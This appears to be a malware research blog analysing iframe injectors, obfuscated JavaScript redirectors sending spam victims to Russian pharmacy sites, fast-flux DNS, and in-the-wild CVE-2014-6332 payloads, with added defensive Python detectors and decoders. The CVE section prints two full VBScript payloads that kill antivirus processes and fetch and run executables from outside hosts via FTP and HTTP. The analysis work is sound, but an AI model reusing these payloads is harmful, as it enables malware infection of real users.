An Official Malware Research Blog of SecNiche Security Labs. Analysis, straight from the hidden and underground.
Sunday, May 14, 2017
[Virus Bulletin Conference] The TAO of Automated Iframe Injectors - Building Drive-by Platforms For Fun and Profit
In this paper, we present the design of the distributed infection model used by attackers to inject malicious iframes on the fly in order to conduct large-scale drive-by download attacks. We use the term "Iframe Injectors" to refer to the automated tools used by attackers to trigger mass infections. Iframe Injectors can be either standalone tools or components embedded in botnets. We discuss the classification of Iframe Injectors and dissect a number of existing tools to understand their functionality and how they are deployed effectively.
Iframes (inline frames) are HTML objects embedded in a web page to fetch content (HTML or JavaScript) from a third-party domain. The content is treated as part of the primary web page and is served when that web page is accessed. This is a standard HTML feature and is heavily used for content sharing among multiple domains. However, attackers abuse it in multiple variants of drive-by download attacks as part of massive iframe infection campaigns. An attack starts with a malicious domain that hosts malware. The attackers then embed a URL referencing the malware in an iframe and place that iframe in a compromised website (or any other website they control). Users are then lured into visiting the web page that has the iframe embedded in it. When the user visits the page, the malware is fetched from the malicious domain and the end-user system is infected.
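As an added example (not code from the paper or from this blog), the following Python check shows the kind of triage a defender can run over fetched pages: it lists iframes that pull content from a host other than the page's own and are hidden or sized down to 1x1, the two tell-tale traits of injected frames. The sample HTML and the hostnames in it are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: one same-origin frame (normal content sharing), one third-party
# frame sized 1x1, and one third-party frame hidden and positioned off-screen.
SAMPLE_HTML = """
<html><body>
<h1>Site news</h1>
<iframe src="/widgets/calendar.html" width="300" height="200"></iframe>
<iframe src="http://third-party.example/load.php" width="1" height="1" frameborder="0"></iframe>
<iframe src="http://cdn.example.net/ad.html" style="position:absolute; left:-9999px; visibility:hidden"></iframe>
</body></html>
"""


class IframeCollector(HTMLParser):
    """Collect the attribute dictionaries of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _tiny(value):
    """True for width/height values of 0 or 1 (with or without a px suffix)."""
    try:
        return int(value.strip().rstrip("px")) <= 1
    except ValueError:
        return False


def suspicious_iframes(html, page_host):
    """Return iframes that load from another host and are hidden or tiny, with the reasons."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for frame in parser.iframes:
        src = frame.get("src", "")
        host = urlparse(src).hostname
        if not host or host == page_host:
            continue  # relative or same-host frames are ordinary page content
        style = frame.get("style", "").replace(" ", "").lower()
        reasons = []
        if _tiny(frame.get("width", "")) and _tiny(frame.get("height", "")):
            reasons.append("1x1 or zero size")
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden via CSS")
        if "left:-" in style or "top:-" in style:
            reasons.append("positioned off-screen")
        if reasons:
            findings.append({"src": src, "host": host, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in suspicious_iframes(SAMPLE_HTML, "www.example.org"):
        print(finding["host"], "->", ", ".join(finding["reasons"]))
```

The check deliberately ignores same-host frames, because the paper's point is that the technique abuses a legitimate feature: the signal is not "an iframe exists" but "an iframe pulls from elsewhere and is made invisible to the visitor".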
For complete details, the paper is available here: https://www.virusbulletin.com/virusbulletin/2016/10/tao-automated-iframe-injectors-building-driveby-platforms-fun-and-profit/
PDF is available here: https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Sood-Bansal.pdf
Tuesday, September 29, 2015
[Updated] Nurturing JavaScript Obfuscation and Fast Flux DNS - "Whats App Voicemail Spamming" for Russian Online Pharmacies!
Recently, we observed spammers sending "Whats App Fake Voicemail" messages to trick end-users into visiting online pharmacy websites. There is a high chance that malware could be downloaded onto the systems of end-users visiting these spam-linked websites; however, during this analysis we did not observe that behavior.
The trend of "Whats App Fake Voicemail" spam messages is not new; we have been encountering this spam activity for the last few years. There have been no significant changes in the method of sending "Whats App Fake Voicemail" notification messages, which are used to lure end-users to illegitimate domains. From a security research perspective, however, the aim is to understand how this spam attack is carried out at the backend. Since the "Whats App" brand is used as bait, there is a high chance that recipients will click the links in the notification emails. This spam attack targets a broad set of Internet users in order to redirect them to online pharmacy outlets managed by Russian cyber actors. More on the monetary model of online pharmacies here: https://en.wikipedia.org/wiki/Online_pharmacy
Let's perform the analysis. The end-user receives the email notification for the "Whats App Fake Voicemail" message as follows:
When the end-user clicks the link, the browser is redirected to the malicious domain, which serves the HTTP response headers shown below. The landing pages are hosted on a WordPress portal that appears to be a compromised website. Let's take a closer look at the HTTP response headers.
GET /wp-content/themes/eStore/epanel/page_templates/js/educating.php HTTP/1.1
Host: pasarjagakarsa.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 29 Sep 2015 19:32:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.44
Content-Encoding: gzip
The highlighted part of the HTTP response headers shows a "404 Not Found" status, which normally means that the resource does not exist on the web server. That is not the case here: the web server responded with the following content as part of the web page.
Before going further, check our earlier articles on JavaScript de-obfuscation
- http://secniche.blogspot.com/2012/04/javascript-obfuscation-manual-armor-1.html
- http://secniche.blogspot.com/2012/04/javascript-obfuscation-manual-armor-2.html
- http://secniche.blogspot.com/2011/04/javascript-camouflaging-primer.html
If you notice, the web page has an obfuscated JavaScript embedded in it. Let's extract the obfuscated JavaScript as shown below:
The obfuscated JS is not complex and can be de-obfuscated easily. On de-obfuscation, we observed that the user's browser was further redirected to the domain "hxxp://magicorganicmarket.ru", as shown below:
Due to a misconfiguration on the landing domain "hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/educating.php", a directory listing was obtained, as follows:
Several other malicious links with obfuscated JavaScript were found and are presented below:
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/chatterer.php
function celle() { cella=72; cellb=[191,177,182,172,183,191,118,188,183,184,118,180,183,171,169,188,177,183,182,118,176,186,173,174,133,111,176,188,188,184,130,119,119,182,169,188,189,186,169,180,176,173,186,170,187,183,189,188,180,173,188,118,186,189,111,131]; cellc=""; for(celld=0;celld<cellb.length;celld++) { cellc+=String.fromCharCode(cellb[celld]-cella); } return cellc; } setTimeout(celle(),1306);
Online Pharmacy Website after De-obfuscating JS Code: hxxp://naturalherbsoutlet.ru/
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/elimination.php
function sicklee() { sicklea=42; sickleb=[161,147,152,142,153,161,88,158,153,154,88,150,153,141,139,158,147,153,152,88,146,156,143,144,103,81,146,158,158,154,100,89,89,145,143,152,143,156,147,141,139,147,142,141,153,151,154,139,152,163,88,156,159,81,101]; sicklec=""; for(sickled=0;sickled<sickleb.length;sickled++) { sicklec+=String.fromCharCode(sickleb[sickled]-sicklea); } return sicklec; } setTimeout(sicklee(),1276);
Online Pharmacy Website after De-obfuscating JS Code: hxxp://genericaidcompany.ru/
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/fresnel.php
function timee() { timea=58; timeb=[177,163,168,158,169,177,104,174,169,170,104,166,169,157,155,174,163,169,168,104,162,172,159,160,119,97,162,174,174,170,116,105,105,167,159,158,163,157,155,166,173,155,160,159,173,159,172,176,163,157,159,173,104,172,175,97,117]; timec=""; for(timed=0;timed<timeb.length;timed++) { timec+=String.fromCharCode(timeb[timed]-timea); } return timec; } setTimeout(timee(),1292);
Online Pharmacy Website after De-obfuscating JS Code: hxxp://medicalsafeservices.ru/
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/sensitive.php
function risee() { risea=80; riseb=[199,185,190,180,191,199,126,196,191,192,126,188,191,179,177,196,185,191,190,126,184,194,181,182,141,119,184,196,196,192,138,127,127,192,181,194,182,181,179,196,184,181,194,178,195,199,181,178,189,177,194,196,126,194,197,119,139]; risec=""; for(rised=0;rised<riseb.length;rised++) { risec+=String.fromCharCode(riseb[rised]-risea); } return risec; } setTimeout(risee(),1314);
Online Pharmacy Website after De-obfuscating JS Code: hxxp://perfectherbswebmart.ru/
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/reclaimers.php
function likede() { likeda=62; likedb=[181,167,172,162,173,181,108,178,173,174,108,170,173,161,159,178,167,173,172,108,166,176,163,164,123,101,166,178,178,174,120,109,109,173,172,170,167,172,163,176,163,171,163,162,183,180,159,170,179,163,108,176,179,101,121]; likedc=""; for(likedd=0;likedd<likedb.length;likedd++) { likedc+=String.fromCharCode(likedb[likedd]-likeda); } return likedc; } setTimeout(likede(),1296);
Online Pharmacy Website after De-obfuscating JS Code: hxxp://onlineremedyvalue.ru/
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/reclaimers.php
function politye() { politya=38; polityb=[157,143,148,138,149,157,84,154,149,150,84,146,149,137,135,154,143,149,148,84,142,152,139,140,99,77,142,154,154,150,96,85,85,148,135,154,155,152,135,146,150,143,146,146,147,135,146,146,84,152,155,77,97]; polityc=""; for(polityd=0;polityd<polityb.length;polityd++) { polityc+=String.fromCharCode(polityb[polityd]-politya); } return polityc; } setTimeout(politye(),1272);
Online Pharmacy Website after De-obfuscating JS Code: hxxp://naturalpillmall.ru/
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/reclaimers.php
function travellere() { travellera=56; travellerb=[175,161,166,156,167,175,102,172,167,168,102,164,167,155,153,172,161,167,166,102,160,170,157,158,117,95,160,172,172,168,114,103,103,160,157,170,154,153,164,160,167,172,168,173,170,155,160,153,171,157,102,170,173,95,115]; travellerc=""; for(travellerd=0;travellerd<travellerb.length;travellerd++) { travellerc+=String.fromCharCode(travellerb[travellerd]-travellera); } return travellerc; } setTimeout(travellere(),1290);
Online Pharmacy Website after De-obfuscating JS Code: hxxp://herbalhotpurchase.ru/
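All of the redirectors above use the same scheme: an integer table, one constant subtracted from every entry, `String.fromCharCode` to rebuild the text, and `setTimeout(fn(),delay)`, which calls the function immediately and hands its string result to the timer so that it is evaluated as code after the delay. Because nothing depends on the browser state, the payload can be recovered statically. The following Python decoder is an added example, not tooling from this blog; it works on the two samples copied from the post (chatterer.php and elimination.php) and on any other sample of this family.

```python
import re

# The chatterer.php and elimination.php redirectors quoted above, copied from the post
# (only the Python string wrapping is added).
SAMPLES = {
    "chatterer.php": (
        "function celle() { cella=72; cellb=[191,177,182,172,183,191,118,188,183,184,118,180,183,171,169,"
        "188,177,183,182,118,176,186,173,174,133,111,176,188,188,184,130,119,119,182,169,188,189,186,169,"
        "180,176,173,186,170,187,183,189,188,180,173,188,118,186,189,111,131]; cellc=\"\"; "
        "for(celld=0;celld<cellb.length;celld++) { cellc+=String.fromCharCode(cellb[celld]-cella); } "
        "return cellc; } setTimeout(celle(),1306);"
    ),
    "elimination.php": (
        "function sicklee() { sicklea=42; sickleb=[161,147,152,142,153,161,88,158,153,154,88,150,153,141,"
        "139,158,147,153,152,88,146,156,143,144,103,81,146,158,158,154,100,89,89,145,143,152,143,156,147,"
        "141,139,147,142,141,153,151,154,139,152,163,88,156,159,81,101]; sicklec=\"\"; "
        "for(sickled=0;sickled<sickleb.length;sickled++) { sicklec+=String.fromCharCode(sickleb[sickled]-sicklea); } "
        "return sicklec; } setTimeout(sicklee(),1276);"
    ),
}

# "<name>=<offset>; <name>=[<ints>]" as it appears at the top of every sample
OFFSET_AND_TABLE = re.compile(r"(\w+)\s*=\s*(\d+)\s*;\s*(\w+)\s*=\s*\[([\d,\s]+)\]")
# setTimeout(fn(), delay): note the call parentheses, fn runs at parse time
TIMER_CALL = re.compile(r"setTimeout\(\s*(\w+)\(\)\s*,\s*(\d+)\s*\)")
URL = re.compile(r"""https?://[^\s'";]+""")


def deobfuscate(js):
    """Undo the 'char code minus constant' scheme statically and pull out the redirect target."""
    m = OFFSET_AND_TABLE.search(js)
    if not m:
        raise ValueError("no offset/table pair found")
    offset = int(m.group(2))
    table = [int(n) for n in m.group(4).split(",")]
    decoded = "".join(chr(n - offset) for n in table)
    # A wrong offset yields control characters or non-ASCII; refuse rather than guess.
    if not all(32 <= ord(c) < 127 for c in decoded):
        raise ValueError("decoded text is not printable ASCII; wrong offset?")
    timer = TIMER_CALL.search(js)
    url = URL.search(decoded)
    return {
        "offset": offset,
        "decoded": decoded,
        "redirect_url": url.group(0) if url else None,
        "delay_ms": int(timer.group(2)) if timer else None,
    }


def decode_all(samples=SAMPLES):
    """Map each sample name to the URL its decoded payload redirects to."""
    return {name: deobfuscate(js)["redirect_url"] for name, js in samples.items()}


if __name__ == "__main__":
    for name, js in SAMPLES.items():
        print(name, deobfuscate(js))
```

The printable-ASCII check is the cheap way to confirm the offset was parsed correctly; the decoded string of these samples is always a one-line `window.top.location.href=...` assignment, which is why a URL regex over the decoded text is enough to extract the pharmacy domain.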
[Updates]
All the information and orders are actually handled by this primary outlet - hxxps://checkoutucxefvfq.fastcheckoutrx.com/
We performed tests at the network level to understand how the name servers were configured and found that DNS fluxing was used in this campaign. The Time-To-Live (TTL) field is set to 600 seconds, after which the IP address of the domain changes.
Here is an example:
perfectherbswebmart.ru. 600 IN A 82.199.121.167
perfectherbswebmart.ru. 600 IN A 198.144.158.52
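A low TTL on its own is not proof of fast flux (CDNs use short TTLs too); the signal is a low TTL combined with answers that move between unrelated networks across lookups. The following Python check is an added example, not tooling from this blog: it takes dig-style A-record lines, keeps the lowest TTL per name, measures how many distinct /16 networks the answers span and how often the answer set changed between lookups, and flags names that combine a short TTL with either. The observation log is constructed: the two perfectherbswebmart.ru answers at t=0 are the ones quoted above, the t=700 answer and the example.com control (a TEST-NET-2 address) are made up.

```python
import ipaddress
from collections import defaultdict

# Constructed observation log: (seconds since first lookup, dig-style answer line).
OBSERVATIONS = [
    (0,   "perfectherbswebmart.ru. 600 IN A 82.199.121.167"),
    (0,   "perfectherbswebmart.ru. 600 IN A 198.144.158.52"),
    (700, "perfectherbswebmart.ru. 600 IN A 203.0.113.77"),   # made up: new answer after TTL expiry
    (0,   "example.com. 86400 IN A 198.51.100.10"),           # made-up control, stable answer
    (700, "example.com. 86400 IN A 198.51.100.10"),
]


def parse_a_record(line):
    """Parse 'name TTL IN A address' into (name, ttl, ip); anything else is rejected."""
    name, ttl, rclass, rtype, rdata = line.split()
    if (rclass, rtype) != ("IN", "A"):
        raise ValueError("not an A record: " + line)
    return name.rstrip("."), int(ttl), ipaddress.ip_address(rdata)


def flux_report(observations, ttl_max=600, min_networks=2):
    """Per name: lowest TTL, answer IPs, /16 spread and answer-set churn across lookups.

    A name is flagged when its TTL is at or below ttl_max AND the answers either span
    min_networks distinct /16s or changed between lookups. /16 is a crude stand-in for
    'different hosting network'; use an ASN lookup instead when one is available.
    """
    ttl_of, timeline = {}, defaultdict(lambda: defaultdict(set))
    for seen_at, line in observations:
        name, ttl, ip = parse_a_record(line)
        ttl_of[name] = min(ttl, ttl_of.get(name, ttl))
        timeline[name][seen_at].add(str(ip))

    report = {}
    for name, by_time in timeline.items():
        snapshots = [by_time[t] for t in sorted(by_time)]
        ips = set().union(*snapshots)
        networks = {str(ipaddress.ip_network(f"{ip}/16", strict=False)) for ip in ips}
        changes = sum(1 for a, b in zip(snapshots, snapshots[1:]) if a != b)
        low_ttl = ttl_of[name] <= ttl_max
        reasons = []
        if low_ttl:
            reasons.append(f"TTL {ttl_of[name]} s")
        if len(networks) >= min_networks:
            reasons.append(f"{len(networks)} distinct /16 networks")
        if changes:
            reasons.append(f"answer set changed {changes} time(s) between lookups")
        report[name] = {
            "ttl": ttl_of[name], "ips": sorted(ips), "changes": changes,
            "flagged": low_ttl and (len(networks) >= min_networks or changes > 0),
            "reasons": reasons,
        }
    return report


if __name__ == "__main__":
    for name, entry in flux_report(OBSERVATIONS).items():
        print(name, "FLAGGED" if entry["flagged"] else "ok", "; ".join(entry["reasons"]))
```

To feed it real data, append the answer lines from repeated `dig +noall +answer <name> A` runs spaced at least one TTL apart; the timestamp column only needs to order the lookups.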
Some analytical points for consideration:
- Extensive use of ".ru" domains has been made in this spamming campaign.
- One can conclude that automated spam-code generation tools have been used in this campaign to ease the process of large-scale infection.
- For example: infecting PHP pages hosted on compromised websites with obfuscated JavaScript code.
- Considering the artefacts, the campaign appears to have been executed at an extensive level.
- Many similar instances of JavaScript obfuscation have been analyzed, as presented above.
- A number of online pharmacy websites were found after de-obfuscating the JavaScript:
- hxxp://herbalhotpurchase.ru/
- hxxp://naturalpillmall.ru/
- hxxp://onlineremedyvalue.ru/
- hxxp://perfectherbswebmart.ru/
- hxxp://medicalsafeservices.ru/
- hxxp://genericaidcompany.ru/
- hxxp://naturalherbsoutlet.ru/
- We believe that this is just the tip of the iceberg and there will be many more.
We won't be surprised if the same tactics are used for drive-by download instead of spamming in particular.
Note: At the time of drafting this post, all the websites were active.
Stay Secure !
Saturday, March 14, 2015
A Real World Story of CVE-2014-6332 : RCE and Malware Download via VBScript !
Recently, we have observed in our analysis that exploit code for the vulnerability CVE-2014-6332 is either embedded directly in the web pages of infected websites or used as part of Browser Exploit Packs (BEPs) to download malware and execute commands remotely.
Earlier, we discussed how Chinese domains served almost identical exploits taken from Metasploit (http://secniche.blogspot.com/2013/03/malware-retrospective-infected-chinese.html) to trigger infections. However, attackers tweak the structure of the exploits as required in order to carry out successful infections on the fly through compromised websites.
Let's discuss the vulnerability in question. From the Internet: "CVE-2014-6332: OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka 'Windows OLE Automation Array Remote Code Execution Vulnerability'."
Refer to the Metasploit module (http://downloads.securityfocus.com/vulnerabilities/exploits/70952.rb) and the Microsoft advisory on the subject (https://technet.microsoft.com/en-us/library/security/ms14-064.aspx).
Trend Micro has already discussed this vulnerability (http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/), so we do not want to discuss it in detail.
Two variants of VBScript that are used in conjunction with this vulnerability have been found and are discussed below. The primary structure of the exploit remains the same, but the payload depends solely on the VBScript code embedded in the web pages or BEPs.
As you can see, "cmd.exe" is triggered with the options "/q /c", which force Windows to execute the command without echoing the output, meaning the commands are executed without any notification in the Windows GUI. Other insights:
The Norton "360.exe" process is killed and several other commands are executed:
<script language="VBScript">
' Payload variant 1 as observed. Each command runs through cmd.exe /q /c (echo off, run the
' command and exit) and WScript.Shell.Run's window-style argument is 0, so no console window
' is shown to the user.
function runmumaa()
On Error Resume Next
set shell=createobject("wscript.shell")
shell.run "cmd.exe /q /c net user admin /del",0
shell.run "cmd.exe /q /c sc stop sharedaccess",0
shell.run "cmd.exe /q /c md C:\RECYCLER",0
' Kill security-product (360*) processes and earlier copies of the payload's own helpers
shell.run "cmd.exe /q /c taskkill /f /im 360rp.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 360sd.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 360tray.exe",0
shell.run "cmd.exe /q /c taskkill /f /im arp2.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 360.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 361.exe",0
' "ping 127.0.0.1 -n 200" is a roughly 200-second sleep before the next round of kills
shell.run "cmd.exe /q /c ping 127.0.0.1 -n 200&taskkill /f /im fp.exe&taskkill /f /im ftp.exe&taskkill /f /im arp1.exe&taskkill /f /im arp2.exe&taskkill /f /im fa1.exe&taskkill /f /im fa2.exe&taskkill /f /im fa.exe",0
' The folder below is the Chinese-locale "Start Menu\Programs\Startup" folder for All Users
shell.run "cmd.exe /q /c del C:\docume~1\alluse~1\「开始」菜单\程序\启动\360.exe",0
shell.run "cmd.exe /q /c del C:\docume~1\alluse~1\「开始」菜单\程序\启动\361.exe",0
shell.run "cmd.exe /q /c del C:\RECYCLER\360.exe",0
shell.run "cmd.exe /q /c del C:\RECYCLER\361.exe",0
' ftp.exe is copied under the name fp.exe, which the FTP script below is run with
shell.run "cmd.exe /q /c copy c:\windows\system32\ftp.exe C:\RECYCLER\fp.exe",0
shell.run "cmd.exe /q /c copy c:\windows\system32\ftp.exe c:\windows\system32\fp.exe",0
shell.run "cmd.exe /q /c copy %systemroot%\system32\ftp.exe %systemroot%\system32\fp.exe",0
' Write an FTP script (fp.dw) line by line, fetch further binaries with "FP -s:", copy two of
' them into the Startup folder, launch them, and delete the script and the renamed ftp client
shell.run "cmd.exe /q /c echo open 104.152.215.90>C:\RECYCLER\fp.dw&echo do1>>C:\RECYCLER\fp.dw&echo 123456>>C:\RECYCLER\fp.dw&echo bin >>C:\RECYCLER\fp.dw&echo get a1.exe C:\RECYCLER\a1.exe>>C:\RECYCLER\fp.dw&echo get arp2.exe C:\RECYCLER\arp2.exe>>C:\RECYCLER\fp.dw&echo get fa2.exe C:\RECYCLER\fa2.exe>>C:\RECYCLER\fp.dw&echo get cgud.exe C:\RECYCLER\cgud.exe>>C:\RECYCLER\fp.dw&echo bye >>C:\RECYCLER\fp.dw&ping 127.0.0.1 -n 10&FP -s:C:\RECYCLER\fp.dw&del C:\RECYCLER\fp.dw /q&copy C:\RECYCLER\fa2.exe C:\docume~1\alluse~1\「开始」菜单\程序\启动\fa2.exe&copy C:\RECYCLER\arp2.exe C:\docume~1\alluse~1\「开始」菜单\程序\启动\arp2.exe&start C:\RECYCLER\fa2.exe&start C:\RECYCLER\a1.exe&start C:\RECYCLER\cgud.exe&C:\RECYCLER\arp2.exe&del C:\RECYCLER\fp.exe",0
end function
</script>
Another variant of the exploit payload is shown below. It shows how HTTP requests are issued using AJAX (MSXML2.XMLHTTP) to download the malware (http://natmasla.ru/ath/sploit/natmasla.exe, this link might still be active) directly; VBScript calls are then used to execute the malware.
<script language="VBScript">
' Payload variant 2 as observed. ShellExecute hands cmd.exe one long command line (written
' here with VBScript line continuation so that each cmd step is visible). Each @echo appends
' one line of VBScript to wUnlRLZR.vbs in %TEMP%: the dropped script downloads the binary
' with MSXML2.XMLHTTP, writes it to disk through ADODB.Stream and runs it via WScript.Shell.
' cscript.exe then executes the dropped script and the last step deletes it. Window style 0
' hides the console window.
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "cmd.exe", "/c CD %TEMP%&" & _
"@echo Set objXMLHTTP=CreateObject(""MSXML2.XMLHTTP"")>wUnlRLZR.vbs&" & _
"@echo objXMLHTTP.open ""GET"",""http://natmasla.ru/ath/sploit/natmasla.exe"",false>>wUnlRLZR.vbs&" & _
"@echo objXMLHTTP.send()>>wUnlRLZR.vbs&" & _
"@echo If objXMLHTTP.Status=200 Then>>wUnlRLZR.vbs&" & _
"@echo Set objADOStream=CreateObject(""ADODB.Stream"")>>wUnlRLZR.vbs&" & _
"@echo objADOStream.Open>>wUnlRLZR.vbs&" & _
"@echo objADOStream.Type=1 >>wUnlRLZR.vbs&" & _
"@echo objADOStream.Write objXMLHTTP.ResponseBody>>wUnlRLZR.vbs&" & _
"@echo objADOStream.Position=0 >>wUnlRLZR.vbs&" & _
"@echo objADOStream.SaveToFile ""%TEMP%\natmasla.exe"">>wUnlRLZR.vbs&" & _
"@echo objADOStream.Close>>wUnlRLZR.vbs&" & _
"@echo Set objADOStream=Nothing>>wUnlRLZR.vbs&" & _
"@echo End if>>wUnlRLZR.vbs&" & _
"@echo Set objXMLHTTP=Nothing>>wUnlRLZR.vbs&" & _
"@echo Set objShell=CreateObject(""WScript.Shell"")>>wUnlRLZR.vbs&" & _
"@echo objShell.Exec(""%TEMP%\natmasla.exe"")>>wUnlRLZR.vbs&" & _
"cscript.exe %TEMP%\wUnlRLZR.vbs&del %TEMP%\wUnlRLZR.vbs", "", "open", 0
end function
</script>
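Both variants funnel everything through a cmd.exe command line, so the questions an analyst asks first (which processes are killed, which files are dropped and what they contain, which URLs and hosts are contacted) can be answered statically by parsing that command line rather than by running the sample. The following Python triage script is an added example, not tooling from this blog: it extracts the string literals handed to `WScript.Shell.Run` and `Shell.Application.ShellExecute`, splits the cmd chain on `&`, reassembles files built with `echo ... >` / `>>`, and collects taskkill targets, URLs and IPv4 addresses. The inputs are constructed, trimmed excerpts of the two payloads quoted above (the FTP credentials and most taskkill targets of variant 1 are left out).

```python
import re

# Constructed triage input: trimmed excerpts of the two payloads shown in the post, with
# each shell call on a single line as the VBScript engine would parse it.
PAYLOAD_1 = r'''set shell=createobject("wscript.shell")
shell.run "cmd.exe /q /c taskkill /f /im 360tray.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 360.exe",0
shell.run "cmd.exe /q /c copy c:\windows\system32\ftp.exe C:\RECYCLER\fp.exe",0
shell.run "cmd.exe /q /c echo open 104.152.215.90>C:\RECYCLER\fp.dw&echo bin >>C:\RECYCLER\fp.dw&echo get a1.exe C:\RECYCLER\a1.exe>>C:\RECYCLER\fp.dw&echo bye >>C:\RECYCLER\fp.dw&FP -s:C:\RECYCLER\fp.dw&del C:\RECYCLER\fp.dw /q&start C:\RECYCLER\a1.exe&del C:\RECYCLER\fp.exe",0'''

PAYLOAD_2 = (r'shell.ShellExecute "cmd.exe", "/c CD %TEMP%&'
             r'@echo Set objXMLHTTP=CreateObject(""MSXML2.XMLHTTP"")>wUnlRLZR.vbs&'
             r'@echo objXMLHTTP.open ""GET"",""http://natmasla.ru/ath/sploit/natmasla.exe"",false>>wUnlRLZR.vbs&'
             r'@echo objXMLHTTP.send()>>wUnlRLZR.vbs&@echo If objXMLHTTP.Status=200 Then>>wUnlRLZR.vbs&'
             r'@echo Set objADOStream=CreateObject(""ADODB.Stream"")>>wUnlRLZR.vbs&@echo objADOStream.Open>>wUnlRLZR.vbs&'
             r'@echo objADOStream.Type=1 >>wUnlRLZR.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>wUnlRLZR.vbs&'
             r'@echo objADOStream.Position=0 >>wUnlRLZR.vbs&@echo objADOStream.SaveToFile ""%TEMP%\natmasla.exe"">>wUnlRLZR.vbs&'
             r'@echo objADOStream.Close>>wUnlRLZR.vbs&@echo End if>>wUnlRLZR.vbs&'
             r'@echo Set objShell=CreateObject(""WScript.Shell"")>>wUnlRLZR.vbs&'
             r'@echo objShell.Exec(""%TEMP%\natmasla.exe"")>>wUnlRLZR.vbs&'
             r'cscript.exe %TEMP%\wUnlRLZR.vbs&del %TEMP%\wUnlRLZR.vbs", "", "open", 0')

VB_STRING = re.compile(r'"((?:[^"]|"")*)"')           # VBScript literal, "" escapes a quote
ECHO_REDIRECT = re.compile(r"^@?echo\s(.*?)\s*(>>?)\s*(\S+)$")
TASKKILL = re.compile(r"taskkill\s+/f\s+/im\s+(\S+)", re.I)
URL = re.compile(r"""https?://[^\s"'<>&,]+""")
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def vb_string_literals(line):
    """Return the string literals on one VBScript line with the "" escape undone."""
    return [m.group(1).replace('""', '"') for m in VB_STRING.finditer(line)]


def cmd_command_lines(vbscript):
    """Collect the argument strings handed to cmd.exe via Run or ShellExecute."""
    cmds = []
    for line in vbscript.splitlines():
        lits = vb_string_literals(line)
        for i, s in enumerate(lits):
            if s.lower().startswith("cmd.exe "):                # shell.run "cmd.exe /q /c ..."
                cmds.append(s[len("cmd.exe "):])
            elif i > 0 and lits[i - 1].lower() == "cmd.exe":    # ShellExecute "cmd.exe", "/c ..."
                cmds.append(s)
    return cmds


def triage(vbscript):
    """Static summary: cmd steps, files rebuilt from echo redirects, killed processes, URLs, IPs."""
    steps, dropped, killed = [], {}, []
    for cmd in cmd_command_lines(vbscript):
        body = re.sub(r"^(?:/[a-z]\s+)+", "", cmd.strip(), flags=re.I)   # drop /q /c switches
        for step in (s.strip() for s in body.split("&")):
            if not step:
                continue
            steps.append(step)
            m = ECHO_REDIRECT.match(step)
            if m:
                text, mode, target = m.groups()
                if mode == ">":                                  # ">" truncates, ">>" appends
                    dropped[target] = []
                dropped.setdefault(target, []).append(text.strip())
            for proc in TASKKILL.findall(step):
                if proc not in killed:
                    killed.append(proc)
    return {
        "steps": steps,
        "dropped_files": {name: "\n".join(lines) for name, lines in dropped.items()},
        "killed_processes": killed,
        "urls": sorted(set(URL.findall(vbscript))),
        "ipv4": sorted(set(IPV4.findall(vbscript))),
    }


if __name__ == "__main__":
    for label, payload in (("variant 1", PAYLOAD_1), ("variant 2", PAYLOAD_2)):
        print(label, triage(payload))
```

Reassembling the dropped file is the useful part: the `>>` chain in variant 2 reads as noise on the wire, but the rebuilt `wUnlRLZR.vbs` is a plain downloader whose URL, on-disk path and launch mechanism can go straight into detection content, and the rebuilt `fp.dw` of variant 1 shows which FTP server and file names to look for.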
Publicly available exploits can be tweaked easily, as discussed in the case study above. It is really interesting to analyze the types of payloads and exploits used in the wild to exploit vulnerabilities in browsers.
Inference: Openly available exploits are restructured by the attackers and used in BEPs to trigger infections.
Labels: Browser Exploit Pack, CVE-2014-6332, Cybercrime, Malware
Sunday, February 8, 2015
Virus Bulletin Paper - Prosecting the Citadel botnet !
Virus Bulletin earlier published our research on Citadel. Check the links:
Full PDF paper : https://www.virusbtn.com/pdf/magazine/2014/vb201409-Citadel.pdf
- Prosecting the Citadel botnet - revealing the dominance of the Zeus descendent: part one : https://www.virusbtn.com/virusbulletin/archive/2014/09/vb201409-Citadel-1
